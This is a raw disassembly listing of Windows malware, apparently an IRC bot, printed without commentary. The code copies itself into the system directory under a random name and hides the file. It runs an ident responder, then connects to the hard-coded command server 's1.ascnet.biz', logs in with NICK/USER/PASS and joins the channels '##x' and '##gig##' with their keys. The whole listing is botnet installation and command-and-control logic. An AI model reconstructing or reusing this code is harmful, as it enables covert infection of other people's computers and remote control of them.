imul eax, 234h
mov dword_43E92C[eax], ebx
lea eax, [ebp-1Ch]
push eax
push ebx
call dword_491688 ; bind
cmp eax, 0FFFFFFFFh
jz loc_407AEF
push 5
push ebx
call dword_491684 ; listen
cmp eax, 0FFFFFFFFh
jz loc_407AEF
mov [ebp-0Ch], edi
mov edi, 200h
loc_407A19: ; CODE XREF: .text:00407A78�j
; .text:00407AD8�j ...
lea eax, [ebp-0Ch]
push eax
lea eax, [ebp-2Ch]
push eax
push ebx
call dword_4916F0 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_407AEA
movzx eax, word ptr [ebp-2Ah]
push eax
push dword ptr [ebp-28h]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp-238h]
push offset unk_42C8D0
push eax
call sub_416821
lea eax, [ebp-238h]
push eax
call sub_401014
add esp, 14h
lea eax, [ebp-238h]
push esi
push edi
push eax
push dword ptr [ebp-4]
call dword_491674 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_407A19
lea eax, [ebp-238h]
push esi
push eax
call sub_4010D7
push 0Ch
lea eax, [ebp-38h]
push esi
push eax
call sub_415CA0
push esi
push esi
lea eax, [ebp-38h]
push 2
push eax
call sub_401343
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp-238h]
push edi
push eax
call sub_4163D7
add esp, 34h
lea eax, [ebp-238h]
push esi
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp-238h]
push eax
push dword ptr [ebp-4]
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jz loc_407A19
mov dword ptr [ebp-8], 1
jmp loc_407A19
; ---------------------------------------------------------------------------
loc_407AEA: ; CODE XREF: .text:00407A2E�j
cmp [ebp-8], esi
jnz short loc_407B16
loc_407AEF: ; CODE XREF: .text:004079D5�j
; .text:004079F9�j ...
call dword_4915F0 ; WSAGetLastError
push eax
lea eax, [ebp-238h]
push offset unk_42C868
push eax
call sub_416821
lea eax, [ebp-238h]
push eax
call sub_401014
add esp, 10h
loc_407B16: ; CODE XREF: .text:00407AED�j
push ebx
call dword_4916F4 ; closesocket
push dword ptr [ebp-4]
call dword_4916F4 ; closesocket
push dword ptr [ebp+8]
call sub_4012A3
pop ecx
push esi
call ds:dword_495334 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 6Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BA3 proc near ; CODE XREF: sub_4012D0�j
var_99C = dword ptr -99Ch
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = dword ptr -0E8h
var_DC = dword ptr -0DCh
var_BC = dword ptr -0BCh
var_B8 = word ptr -0B8h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_4], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], offset off_4011EA
push [ebp+var_C]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_495340
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4834B0, eax
call esi ; GetTickCount
push eax
call sub_416B0E
pop ecx
call sub_4012F3
push 2
call dword_491708 ; SetErrorMode
push 7530h
push offset dword_42C954
push ebx
push ebx
call ds:dword_4953B0 ; CreateMutexA
push eax
call ds:dword_4953AC ; WaitForSingleObject
cmp eax, 102h
jnz short loc_407C23
push 1
call ds:dword_495350 ; ExitProcess
loc_407C23: ; CODE XREF: sub_407BA3+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_4915D4 ; WSAStartup
cmp eax, ebx
mov [ebp+var_C], eax
jnz loc_408261
cmp [ebp+var_888], 2
jnz loc_40825B
xor eax, eax
mov al, [ebp+var_887]
cmp al, 2
jnz loc_40825B
mov esi, 104h
lea eax, [ebp+var_3F4]
push esi
push eax
call ds:dword_495364 ; GetSystemDirectoryA
lea eax, [ebp+var_2F0]
push esi
push eax
push ebx
call ds:dword_4953A8 ; GetModuleHandleA
push eax
call ds:dword_495330 ; GetModuleFileNameA
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_5F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_417900
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_5F8]
push eax
push offset aSS_0 ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_4163D7
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_417760
add esp, 30h
test eax, eax
jnz loc_407E98
cmp dword_42C934, ebx
mov esi, offset aQjmk_exe ; "qjmk.exe"
jz short loc_407D1E
push esi
xor edi, edi
call sub_4158E0
sub eax, 4
pop ecx
jz short loc_407D1E
loc_407CFB: ; CODE XREF: sub_407BA3+179�j
call sub_416B18
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte ptr aQjmk_exe[edi], dl ; "qjmk.exe"
inc edi
call sub_4158E0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_407CFB
loc_407D1E: ; CODE XREF: sub_407BA3+148�j
; sub_407BA3+156�j
lea eax, [ebp+var_3F4]
push esi
push eax
lea eax, [ebp+var_1EC]
push offset aSS_2 ; "%s\\%s"
push eax
call sub_416821
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_495374 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_407D5E
lea eax, [ebp+var_1EC]
push 80h
push eax
call ds:dword_4953A4 ; SetFileAttributesA
loc_407D5E: ; CODE XREF: sub_407BA3+1A7�j
mov esi, ds:dword_4953A0
lea eax, [ebp+var_1EC]
push ebx
push eax
lea eax, [ebp+var_2F0]
xor edi, edi
push eax
loc_407D75: ; CODE XREF: sub_407BA3+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_407DAE
call ds:dword_495328 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_407DAE
cmp eax, 20h
jz short loc_407D8F
cmp eax, 5
jnz short loc_407DAE
loc_407D8F: ; CODE XREF: sub_407BA3+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_495324 ; Sleep
lea eax, [ebp+var_1EC]
push ebx
push eax
lea eax, [ebp+var_2F0]
push eax
jmp short loc_407D75
; ---------------------------------------------------------------------------
loc_407DAE: ; CODE XREF: sub_407BA3+1D6�j
; sub_407BA3+1E0�j ...
lea eax, [ebp+var_1EC]
push eax
call sub_401320
pop ecx
lea eax, [ebp+var_1EC]
push 7
push eax
call ds:dword_4953A4 ; SetFileAttributesA
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_415CA0
push 44h
lea eax, [ebp+var_E8]
pop esi
push esi
push ebx
push eax
call sub_415CA0
add esp, 18h
mov [ebp+var_E8], esi
mov [ebp+var_DC], offset byte_4370BC
mov [ebp+var_B8], bx
push 1
pop esi
mov [ebp+var_BC], esi
call ds:dword_49539C ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_495398 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_416821
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_98C]
push ebx
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_495354 ; CreateProcessA
test eax, eax
jz short loc_407E98
push 0C8h
call ds:dword_495324 ; Sleep
push [ebp+var_24]
mov esi, ds:dword_495358
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_4915BC ; WSACleanup
push ebx
call ds:dword_495350 ; ExitProcess
loc_407E98: ; CODE XREF: sub_407BA3+137�j
; sub_407BA3+2CB�j
cmp dword_492810, 2
jle short loc_407EE4
mov eax, dword_492814
push dword ptr [eax+4]
call sub_416CCF
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4953AC ; WaitForSingleObject
push esi
call ds:dword_495358 ; CloseHandle
mov eax, dword_492814
cmp [eax+8], ebx
jz short loc_407EE4
push 7D0h
call ds:dword_495324 ; Sleep
mov eax, dword_492814
push dword ptr [eax+8]
call ds:dword_495394 ; DeleteFileA
loc_407EE4: ; CODE XREF: sub_407BA3+2FC�j
; sub_407BA3+326�j
cmp dword_42C938, ebx
jz short loc_407F01
cmp dword_49172C, ebx
jnz short loc_407F01
lea eax, [ebp+var_4F8]
push eax
call sub_4012FD
pop ecx
loc_407F01: ; CODE XREF: sub_407BA3+347�j
; sub_407BA3+34F�j
lea eax, [ebp+var_A4]
push offset dword_42D3CC
push eax
call sub_416821
push ebx
lea eax, [ebp+var_A4]
push ebx
push eax
call sub_40105F
lea eax, [ebp+var_A4]
push eax
call sub_401014
push 0B80h
push ebx
push offset dword_43DBA0
call sub_415CA0
lea eax, [ebp+var_A4]
push offset unk_42D398
push eax
call sub_416821
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_40105F
add esp, 38h
mov edi, eax
mov esi, ds:dword_49532C
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push offset sub_401357
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_43E934[edi], eax
jnz short loc_407FA1
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A4]
push offset unk_42D340
push eax
call sub_416821
add esp, 0Ch
loc_407FA1: ; CODE XREF: sub_407BA3+3E1�j
lea eax, [ebp+var_A4]
push eax
call sub_401014
lea eax, [ebp+var_A4]
mov [esp+99Ch+var_99C], offset unk_42D300
push eax
call sub_416821
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_40105F
add esp, 14h
mov edi, eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push offset sub_401276
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_43E934[edi], eax
jnz short loc_40800E
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A4]
push offset unk_42D2AC
push eax
call sub_416821
add esp, 0Ch
loc_40800E: ; CODE XREF: sub_407BA3+44E�j
lea eax, [ebp+var_A4]
push eax
call sub_401014
lea eax, [ebp+var_A4]
mov [esp+99Ch+var_99C], offset unk_42D270
push eax
call sub_416821
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_40105F
add esp, 14h
mov edi, eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4F8]
push ebx
push eax
push offset sub_401019
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_43E934[edi], eax
jnz short loc_408081
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A4]
push offset unk_42D21C
push eax
call sub_416821
add esp, 0Ch
loc_408081: ; CODE XREF: sub_407BA3+4C1�j
lea eax, [ebp+var_A4]
push eax
call sub_401014
push 2
call sub_4010E6
pop ecx
test eax, eax
pop ecx
jnz short loc_408106
lea eax, [ebp+var_A4]
push offset unk_42D1DC
push eax
call sub_416821
push ebx
lea eax, [ebp+var_A4]
push 2
push eax
call sub_40105F
add esp, 14h
mov edi, eax
lea eax, [ebp+var_4]
push eax
push ebx
push edi
push offset sub_401195
push ebx
push ebx
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_43E934[edi], eax
jnz short loc_4080F9
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_A4]
push offset unk_42D190
push eax
call sub_416821
add esp, 0Ch
loc_4080F9: ; CODE XREF: sub_407BA3+539�j
lea eax, [ebp+var_A4]
push eax
call sub_401014
pop ecx
loc_408106: ; CODE XREF: sub_407BA3+4F5�j
call sub_416B18
push 7Fh
and eax, 3
push offset aS1_ascnet_biz ; "s1.ascnet.biz"
push offset dword_4834BC
mov dword_483634, eax
call sub_416A10
mov eax, dword_42C918
push 3Fh
mov edi, offset dword_48353C
push offset asc_42C978 ; "##x"
push edi
mov dword_48360C, eax
call sub_416A10
push 3Fh
mov esi, offset dword_48357C
push offset aG1g ; "g1g"
push esi
call sub_416A10
add esp, 24h
mov dword_483610, ebx
loc_40815B: ; CODE XREF: sub_407BA3+65E�j
; sub_407BA3+669�j ...
mov [ebp+var_8], ebx
loc_40815E: ; CODE XREF: sub_407BA3+612�j
cmp dword_491744, ebx
jnz short loc_40817C
lea eax, [ebp+var_14]
push ebx
push eax
call dword_4915A0 ; InternetGetConnectedState
test eax, eax
jnz short loc_40817C
push 7530h
jmp short loc_4081A8
; ---------------------------------------------------------------------------
loc_40817C: ; CODE XREF: sub_407BA3+5C1�j
; sub_407BA3+5D0�j
push offset dword_4834B8
mov dword_483630, ebx
call sub_4010FF
cmp eax, 2
mov [ebp+var_C], eax
jz loc_408256
cmp dword_483630, ebx
jz short loc_4081A3
dec [ebp+var_8]
loc_4081A3: ; CODE XREF: sub_407BA3+5FB�j
push 0BB8h
loc_4081A8: ; CODE XREF: sub_407BA3+5D7�j
call ds:dword_495324 ; Sleep
inc [ebp+var_8]
cmp [ebp+var_8], 6
jl short loc_40815E
cmp [ebp+var_C], 2
jz loc_408256
cmp [ebp+var_10], ebx
jz short loc_408206
push 7Fh
push offset aS1_ascnet_biz ; "s1.ascnet.biz"
push offset dword_4834BC
call sub_416A10
mov eax, dword_42C918
push 3Fh
push offset asc_42C978 ; "##x"
push edi
mov dword_48360C, eax
call sub_416A10
push 3Fh
push offset aG1g ; "g1g"
push esi
call sub_416A10
add esp, 24h
mov [ebp+var_10], ebx
jmp loc_40815B
; ---------------------------------------------------------------------------
loc_408206: ; CODE XREF: sub_407BA3+621�j
cmp byte_48362C, bl
jz loc_40815B
push 7Fh
push offset byte_48362C
push offset dword_4834BC
call sub_416A10
mov eax, dword_42C91C
push 3Fh
push offset aGig ; "##gig##"
push edi
mov dword_48360C, eax
call sub_416A10
push 3Fh
push offset aKeyzzz ; "keyzzz"
push esi
call sub_416A10
add esp, 24h
mov [ebp+var_10], 1
jmp loc_40815B
; ---------------------------------------------------------------------------
loc_408256: ; CODE XREF: sub_407BA3+5EF�j
; sub_407BA3+618�j
call sub_401109
loc_40825B: ; CODE XREF: sub_407BA3+A4�j
; sub_407BA3+B4�j
call dword_4915BC ; WSACleanup
loc_408261: ; CODE XREF: sub_407BA3+97�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_407BA3 endp
; ---------------------------------------------------------------------------
db 1B1h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40841B proc near ; CODE XREF: sub_4010FF�j
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_408440: ; CODE XREF: sub_40841B+E6�j
; sub_40841B+136�j ...
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415CA0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_3C]
call dword_49165C ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_4011C2
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_40856D
push 1Ch
lea eax, [ebp+var_2C]
push 0
push eax
call sub_415CA0
push 0
lea eax, [ebp+var_2C]
push dword_483620
push dword_42C92C
push eax
call sub_401343
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_43E938
push edi
push eax
call sub_416A10
add esp, 28h
push 6
push 1
push 2
call dword_4916DC ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_43E92C[eax], esi
lea eax, [ebp+var_10]
push eax
push esi
call dword_491604 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_408506
push esi
call dword_4916F4 ; closesocket
call sub_4010CD
push 7D0h
loc_4084FB: ; CODE XREF: sub_40841B+146�j
call ds:dword_495324 ; Sleep
jmp loc_408440
; ---------------------------------------------------------------------------
loc_408506: ; CODE XREF: sub_40841B+CD�j
lea eax, [ebp+var_18C]
push eax
push offset unk_42D40C
call sub_4012B2
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40116D
add esp, 28h
mov edi, eax
push esi
call dword_4916F4 ; closesocket
test edi, edi
jz loc_408440
cmp edi, 1
jnz short loc_408563
push 0DBBA0h
jmp short loc_4084FB
; ---------------------------------------------------------------------------
loc_408563: ; CODE XREF: sub_40841B+13F�j
cmp edi, 2
jz short loc_408571
jmp loc_408440
; ---------------------------------------------------------------------------
loc_40856D: ; CODE XREF: sub_40841B+5A�j
xor eax, eax
jmp short loc_40857D
; ---------------------------------------------------------------------------
loc_408571: ; CODE XREF: sub_40841B+14B�j
push [ebp+var_34]
call sub_4012A3
pop ecx
push 2
pop eax
loc_40857D: ; CODE XREF: sub_40841B+154�j
pop edi
pop esi
leave
retn 4
sub_40841B endp
; ---------------------------------------------------------------------------
db 5Ah dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085DD proc near ; CODE XREF: sub_40116D�j
var_1B90 = byte ptr -1B90h
var_B90 = byte ptr -0B90h
var_3C0 = byte ptr -3C0h
var_140 = byte ptr -140h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1B90h
call sub_416880
push ebx
push esi
push edi
xor ebx, ebx
push 5
mov [ebp+var_8], ebx
lea eax, [ebp+var_3C0]
pop ecx
loc_4085FB: ; CODE XREF: sub_4085DD+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_4085FB
cmp byte_483628, bl
jz short loc_408622
push offset byte_483628
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0]
call sub_401032
add esp, 0Ch
loc_408622: ; CODE XREF: sub_4085DD+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_401343
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_416821
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call dword_4916AC ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40868C
push [ebp+arg_0]
call dword_4916F4 ; closesocket
push 1388h
call ds:dword_495324 ; Sleep
loc_408685: ; CODE XREF: sub_4085DD+D9�j
; sub_4085DD+153�j
xor eax, eax
loc_408687: ; CODE XREF: sub_4085DD+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40868C: ; CODE XREF: sub_4085DD+92�j
; sub_4085DD+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1B90]
push esi
push ebx
push eax
call sub_415CA0
add esp, 0Ch
lea eax, [ebp+var_1B90]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_491674 ; recv
test eax, eax
jle short loc_408685
lea eax, [ebp+var_B90]
push eax
lea eax, [ebp+var_1B90]
push eax
call sub_4010D7
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_40868C
lea edi, [ebp+var_B90]
loc_4086DD: ; CODE XREF: sub_4085DD+165�j
push 1
pop esi
loc_4086E0: ; CODE XREF: sub_4085DD+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_3C0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call sub_40110E
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_408723
push 7D0h
call ds:dword_495324 ; Sleep
jmp short loc_4086E0
; ---------------------------------------------------------------------------
loc_408723: ; CODE XREF: sub_4085DD+137�j
cmp esi, 0FFFFFFFDh
jz short loc_40874D
cmp esi, 0FFFFFFFEh
jz short loc_408749
cmp esi, 0FFFFFFFFh
jz loc_408685
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_4086DD
jmp loc_40868C
; ---------------------------------------------------------------------------
loc_408749: ; CODE XREF: sub_4085DD+14E�j
push 1
jmp short loc_40874F
; ---------------------------------------------------------------------------
loc_40874D: ; CODE XREF: sub_4085DD+149�j
push 2
loc_40874F: ; CODE XREF: sub_4085DD+16E�j
pop eax
jmp loc_408687
sub_4085DD endp
; ---------------------------------------------------------------------------
db 5Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087B3 proc near ; CODE XREF: sub_40110E�j
var_159C = byte ptr -159Ch
var_119C = byte ptr -119Ch
var_F9C = byte ptr -0F9Ch
var_D9C = byte ptr -0D9Ch
var_C9C = byte ptr -0C9Ch
var_C98 = byte ptr -0C98h
var_B98 = byte ptr -0B98h
var_B94 = byte ptr -0B94h
var_A94 = byte ptr -0A94h
var_A14 = byte ptr -0A14h
var_9B3 = byte ptr -9B3h
var_9B2 = byte ptr -9B2h
var_9B0 = byte ptr -9B0h
var_9AF = byte ptr -9AFh
var_9A6 = byte ptr -9A6h
var_9A4 = byte ptr -9A4h
var_9A2 = byte ptr -9A2h
var_9A1 = byte ptr -9A1h
var_914 = dword ptr -914h
var_910 = byte ptr -910h
var_80C = dword ptr -80Ch
var_808 = dword ptr -808h
var_804 = byte ptr -804h
var_788 = byte ptr -788h
var_778 = dword ptr -778h
var_774 = byte ptr -774h
var_700 = byte ptr -700h
var_6F8 = dword ptr -6F8h
var_6F4 = byte ptr -6F4h
var_689 = byte ptr -689h
var_688 = byte ptr -688h
var_674 = byte ptr -674h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = byte ptr -5F0h
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_570 = dword ptr -570h
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_548 = byte ptr -548h
var_4F0 = dword ptr -4F0h
var_4EC = byte ptr -4ECh
var_4E0 = dword ptr -4E0h
var_4DC = byte ptr -4DCh
var_4AC = byte ptr -4ACh
var_48C = dword ptr -48Ch
var_46C = dword ptr -46Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = dword ptr -454h
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_444 = byte ptr -444h
var_430 = byte ptr -430h
var_420 = byte ptr -420h
var_40C = dword ptr -40Ch
var_404 = byte ptr -404h
var_3F8 = dword ptr -3F8h
var_3F4 = byte ptr -3F4h
var_3E8 = byte ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3C4 = byte ptr -3C4h
var_3A0 = byte ptr -3A0h
var_384 = byte ptr -384h
var_374 = byte ptr -374h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = byte ptr -2E4h
var_E4 = byte ptr -0E4h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = dword ptr -0D4h
var_C8 = dword ptr -0C8h
var_C4 = byte ptr -0C4h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_60 = byte ptr -60h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 159Ch
call sub_416880
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2E4]
push ebx
push eax
mov [ebp+var_A8], 3
mov [ebp+var_10], ebx
mov [ebp+var_AC], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_C8], ebx
call sub_415CA0
push 1Bh
lea eax, [ebp+var_564]
push [ebp+arg_10]
push eax
call sub_416A10
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_408B77
push esi
lea eax, [ebp+var_F9C]
push ebx
push eax
call sub_415CA0
dec esi
lea eax, [ebp+var_F9C]
push esi
push [ebp+arg_0]
push eax
call sub_416A10
lea eax, [ebp+var_F9C]
push offset asc_42F9C0 ; " :"
push eax
call sub_417760
mov [ebp+var_C], eax
lea eax, [ebp+var_F9C]
push esi
push eax
lea eax, [ebp+var_119C]
push eax
call sub_416A10
mov esi, offset asc_42BFC4 ; " "
lea eax, [ebp+var_119C]
push esi
push eax
call sub_4176C0
add esp, 34h
mov [ebp+var_A0], eax
lea edi, [ebp+var_9C]
mov [ebp+var_A4], 1Fh
loc_408886: ; CODE XREF: sub_4087B3+E7�j
push esi
push ebx
call sub_4176C0
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+var_A4]
pop ecx
jnz short loc_408886
mov esi, [ebp+var_A0]
cmp esi, ebx
jz loc_408B77
cmp [ebp+var_9C], ebx
jz loc_408B77
push 100h
lea eax, [ebp+var_A14]
push ebx
push eax
call sub_415CA0
add esp, 0Ch
lea ecx, [ebp+var_24]
push 1Fh
pop edx
push 1
pop edi
loc_4088D4: ; CODE XREF: sub_4087B3+153�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_408900
cmp byte ptr [eax], 2Dh
jnz short loc_408908
cmp [eax+2], bl
jnz short loc_408908
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_A14], 1
mov esi, [ebp+var_A0]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_408900: ; CODE XREF: sub_4087B3+125�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_4088D4
loc_408908: ; CODE XREF: sub_4087B3+12A�j
; sub_4087B3+12F�j
cmp [ebp+var_9A1], bl
jz short loc_408913
mov [ebp+var_8], edi
loc_408913: ; CODE XREF: sub_4087B3+15B�j
cmp [ebp+var_9A6], bl
jz short loc_408921
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_408921: ; CODE XREF: sub_4087B3+166�j
cmp byte ptr [esi], 0Ah
jz short loc_40895B
push 7Fh
lea eax, [ebp+var_A94]
push esi
push eax
call sub_416A10
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_C4]
push eax
call sub_416A10
lea eax, [ebp+var_C4]
push offset asc_42F9BC ; "!"
push eax
call sub_4176C0
add esp, 20h
loc_40895B: ; CODE XREF: sub_4087B3+171�j
push esi
push offset aPing ; "PING"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_4089AC
push [ebp+var_9C]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_401032
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_408A50
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401032
add esp, 10h
jmp loc_408A50
; ---------------------------------------------------------------------------
loc_4089AC: ; CODE XREF: sub_4087B3+1B7�j
